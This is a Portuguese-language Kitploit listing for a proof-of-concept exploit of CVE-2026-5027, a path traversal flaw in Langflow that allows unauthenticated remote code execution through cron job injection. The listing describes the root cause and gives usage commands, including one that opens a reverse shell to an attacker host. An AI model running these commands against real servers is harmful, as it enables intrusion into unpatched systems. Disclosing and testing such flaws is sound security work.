Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-5027 — Prova de conceito de exploit para CVE-2026-5027, uma vulnerabilidade de path traversal no Langflow que leva à execução remota de código não autenticada por meio de injeção de cron job. | Kitploit
Ferramentas/GitHubGitHub/yahiahamza/cve-2026-5027
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubyahiahamza/cve-2026-5027

CVE-2026-5027

Prova de conceito de exploit para CVE-2026-5027, uma vulnerabilidade de path traversal no Langflow que leva à execução remota de código não autenticada por meio de injeção de cron job.

Ver Repositório
423há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-5027 - Langflow Path Traversal para Execução Remota de Código

Descrição

As versões do Langflow até e incluindo a 1.8.4 não sanitizam o parâmetro filename no endpoint POST /api/v2/files. Um atacante pode usar sequências de path traversal (../) para escrever arquivos em locais arbitrários do sistema de arquivos. Quando combinado com a configuração padrão de auto-login do Langflow, isso é explorável sem qualquer autenticação, levando à Execução Remota de Código como root via injeção de cron job.

Versões Afetadas

  • Vulnerável: Langflow <= 1.8.4
  • Corrigido: Nenhum patch disponível no momento da escrita
  • Configuração padrão: Auto-login habilitado (exploração não autenticada)
  • Aviso: Tenable TRA-2026-26

Uso

root@kitploit:~
# Prova de conceito (escreve arquivo de teste em /tmp/)
python3 exploit.py -t http://target:7860

# Com credenciais (se o auto-login estiver desabilitado)
python3 exploit.py -t http://target:7860 -u admin -p password

# Reverse shell via cron job
python3 exploit.py -t http://target:7860 --lhost YOUR_IP --lport 4444

Exemplo de Saída

CVE-2026-5027 Exploit

CVE-2026-5027 Reverse Shell

Causa Raiz

A função upload_user_file() em src/backend/base/langflow/api/v2/files.py passa file.filename diretamente para o serviço de armazenamento sem sanitização. O LocalStorageService.save_file() constrói o caminho usando folder_path / file_name, o que não impede path traversal.

Referências

  • Aviso Tenable TRA-2026-26
  • Langflow GitHub
  • CVE-2026-5027: Langflow Path Traversal para RCE - Análise Técnica Completa

Aviso Legal

Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais. Use somente em sistemas que você possui ou para os quais tenha permissão explícita para testar.

Autor

Yahia Hamza - https://yh.do

Baixar ferramenta